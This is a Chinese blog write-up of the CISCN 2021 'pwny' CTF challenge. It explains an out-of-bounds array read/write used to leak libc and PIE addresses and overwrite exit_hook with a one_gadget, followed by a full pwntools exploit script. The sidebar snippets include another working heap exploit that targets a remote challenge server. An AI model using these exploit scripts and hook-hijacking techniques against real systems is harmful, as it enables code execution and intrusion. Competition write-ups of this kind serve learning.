CISCN2021pwn pwny(数组越界,劫持exit_hook)

最新推荐文章于 2024-06-09 19:58:21 发布
最新推荐文章于 2024-06-09 19:58:21 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127149698
版权

目录


复现一下

程序分析:

保护全开
请添加图片描述
这里有show,write,exit功能
请添加图片描述
show功能可以读出一个数组的内容,这里index没有限制,显然我们能数组越界泄露我们想要的地址
请添加图片描述
write功能是写值到指定数组,但index也没有限制,可以任意写

请添加图片描述
值得注意的是两个功能里的read函数的fd是byte_202860,而它已经被赋值了一个随机数
请添加图片描述
所以我们要把它改为0,程序的功能才能正常执行

我们可以用write的数组越界write(256)到byte_202860,由于write里的read没法使用,只能把0写给它,所以fd就改为0了
要用两次write(256)

我们用show数组越界泄露_IO_2_1_stderr_得到libc_base
我们可以gdb调试
p &_rtld_global
得到地址0x7f2287193060
减去libc_base
0x7f2287193060-0x7f2286b78000=0x61B060
最后加上偏移3848,3840都可以
所以exit_hook=libc_base+0x61BF60
exit_hook可以看这篇
https://www.cnblogs.com/bhxdn/p/14222558.html
继续泄露data段的实际地址
算出pie_base=data段的实际地址-data段的偏移地址(0x202008)
得出数组的实际地址=pie_base+0x202060

偏移到exit_hook的下标=(exit_hook-数组的实际地址)/8
我们write写入onegadget
这里找one_gadget要加-l 1
one_gadget ./libc-2.27.so -l 1
等级提高一级,找到更多onegadget

exp

from pwn import * 
local_file  = './pwny'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25904 )
    libc = ELF(remote_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
def show(index):
    sla('Your choice: ','1')
    sa('Index: ',str(index))
def write(index,content):
    sla('Your choice: ','2')
    sla('Index: ',str(index))
    se(content)

#-----------------------
sla('Your choice: ','2')
sla('Index: ','256')
sla('Your choice: ','2')
sla('Index: ','256')
#----------------------
show(p64(0xFFFFFFFFFFFFFFFC)) #-4
ru('Result: ')
libc=int(rc(12),16)
libc_base=libc-0x3EC680  #_IO_2_1_stderr_  00000000003EC680
info('libc_base',libc_base)
og=[0x4f2a5,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
#---------------------------------
show(p64(0xFFFFFFFFFFFFFFF5))#-11
ru('Result: ')
data=int(rc(12),16)
info('data',data)
pie_base=data-0x202008
info('pie_base',pie_base)
#--------------------------------
exit_hook=libc_base+0x61bf60
info('exit_hook',exit_hook)
offest=(exit_hook-(pie_base+0x202060))/8
info('offest',offest)
write(offest,p64(og[6]+libc_base))
sla('Your choice: ','3')
#debug()
r.interactive()

请添加图片描述

参考师傅:
https://blog.csdn.net/zzq487782568/article/details/124803266

当然还有其他的做法,改malloc_hook为og,用scanf输入过长会申请堆块来触发,或者改栈的ret为og(泄露靠environ)之类的

Nq0inaen
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3
arttnba3的博客
04-05 1008
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4393
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
[XYCTF新生赛]-PWN:ptmalloc2 it‘s myheap pro解析(glibc2.35,劫持exit_hook(tls_dtor_list))
最新发布
2301_79326813的博客
06-09 358
查看保护查看ida题目的libc版本是2.35,在glibc2.34版本的时候我们常用的exithook(比如dl_rtld_lock_recursive和dl_rtld_unlock_recursive)就被删除了,所以在这道题里面我们劫持另一个exithook,tls_dtor_list,但这里和之前我们常用exithook不同,它并不是简单地覆盖就可以执行了,它的利用过程相较于之前常用的exithook更复杂。下面详细讲一下。
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 330
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
2022 hgame pwn wp
weixin_45209963的博客
03-27 4694
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
BUUCTF pwn wp 141 - 145
fa1c4的blog
04-29 506
ciscn_2019_n_7 qctf_2018_stack2 falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2;checksec QCTF_2018_stack2 QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.
BUUCTF pwn wp 101 - 105
fa1c4的blog
03-03 334
wustctf2020_number_game ciscn_2019_final_2 wustctf2020_easyfast 做过了 https://blog.csdn.net/qq_33976344/article/details/120132888 starctf_2019_babyshell wustctf2020_name_your_dog
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 867
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3204
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
蓝帽杯2022 pwn Bank
z1r0的博客
07-12 528
保护全开 这道题其实逆清楚了基本就可以解出来了 这里是输入对应的单词就可以进入对应的功能 先看一下Deposit功能 先判断是否login,接着输入多少钱,然后判断一下card_money钱是否足够,如何足够则总钱+输入的,这个函数没什么用。 看一下put函数 这里就是需要存放的钱,判断是否小于总钱。并将需要存放的钱放入card_money中 接下来再看login函数 输入card_numbers,需要过检测 长度大于0,并在0-9之间,接下来输入密码的时候长度需要大于5,也是0-9 满足上面
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3193
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2747
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1747
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1744
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
from pwn import * context(log_level='debug',os='linux',arch='i386') # p = process("./1") p = remote("59.110.164.72",10085) elf=ELF('./1') libc=ELF('libc-2.27.so') # gdb.attach(p,"b *0x400e2b") # pause() payload1 ="+"+str(0x7E4750AB) p.sendlineafter(b"welcome~ please input the password:\n",payload1) def menu(choice): p.sendlineafter(b"please choose one!\n",str(choice)) def add(size): menu(1) p.sendlineafter(b"Age of Stu:\n",str(size)) def edit(idx,com): menu(3) p.sendlineafter(b"Index:\n",str(idx)) p.sendlineafter(b"Content of Stu:\n",com) def free(idx): menu(2) p.sendlineafter(b"Index:\n",str(idx)) def show(idx): menu(4) p.sendlineafter(b"Index:\n",str(idx)) for i in range(9): add(0x100) for i in range(9,-1,-1): free(i) for i in range(7): add(0x100) add(0x100) show(7) p.recvuntil("Content : ") libc_base = u64(p.recv(6).ljust(8,b"\x00"))-0x3ebeb0 print ("libc_base -->",hex(libc_base)) free_hook = libc_base+libc.sym['__free_hook'] one = [0x4f2a5,0x4f302,0x10a2fc] gadgeb = one[1]+libc_base free(0) free(1) free(2) edit(2,p64(free_hook)) add(0x100) add(0x100) edit(6,p64(gadgeb)) edit(7,"/bin/sh\x00") # gdb.attach(p,"b *0x400c8f") # pause() free(7) p.interactive()这串代码的知识点
06-01
具体来说,它通过向程序发送特定的输入,构造了一段堆的布局,然后通过 UAF 改变一个指针的指向,改为了 `__free_hook` 的地址,并将一个 one gadget 的地址写入到 `__free_hook` 中,最后通过释放一个指向 "/bin/sh...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值